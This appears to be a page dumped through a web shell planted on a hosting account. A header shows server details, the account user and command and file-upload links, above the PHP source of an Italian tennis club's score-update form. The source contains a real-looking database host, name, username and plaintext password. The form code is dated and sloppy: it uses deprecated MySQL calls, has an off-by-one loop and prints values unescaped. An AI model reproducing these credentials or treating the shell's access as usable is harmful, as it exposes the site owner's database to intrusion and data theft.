|
Server IP : 10.111.20.6 / Your IP : 216.73.217.121 Web Server : Apache System : Linux webm006.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : edizioni ( 7252) PHP Version : 8.3.23 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/edizioni/stampaeweb/../wordpress/../extonymask/language/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Aggiornamento Punti Circolo Tennis Ribera</title>
<style>
input, select {
font-size:30px;
}
</style>
</head>
<?php
$punti =array(0,16, 46, 62, 92, 124);
include_once('mysql-fix.php');
require_once("support/funformat.php");
$dbhost1 = "edizionitonym4sk.mysql.db"; $dbname1 = "edizionitonym4sk"; $dbuser1 = "edizionitonym4sk"; $dbpass1 = "Didier0533";
$conn1 = mysql_connect($dbhost1,$dbuser1,$dbpass1)
or die("Impossibile collegarsi al server MySQL.");
mysql_select_db($dbname1,$conn1)
or die("Impossibile selezionare il database $dbname");
$sql1 = "SELECT * FROM circolo ORDER BY giocatore";
$result1 = mysql_query($sql1,$conn1); ?>
<body>
<div style="text-align:center; font-size:30px; margin-top:5%">
<p style="text-align:center"><img src="imgtennisti/logosito.png"></p>
<form id="pippo" action="salvapunti.php" method="POST" target="_self" name="surci">
Giocatore
<select name="txt_giocatori">
<?php
if($result1){
$i=0;
do{
$riga=mysql_fetch_array($result1);
$recordsetx[$i]=$riga;
$giocatore= $recordsetx[$i]['giocatore'] ;
$id= $recordsetx[$i]['id'] ;
if (trim($giocatore)<>''){
echo "<option value=$id>$giocatore</option>";
}
}while($riga);
$i++;
}else{
mysql_close($conn1);
}
?>
</select>
<br><br>Punti
<select name="txt_punti">
<?php
for ($j=0; $j<=count($punti);$j++){
echo "<option value=$punti[$j]>$punti[$j]</option>";
}
?>
</select>
<br><br>Password <input name="txt_parola" type="password" style="text-align:center">
<br><br><input type="submit" value="Salva"/>
</form>
</div>
</body>
</html>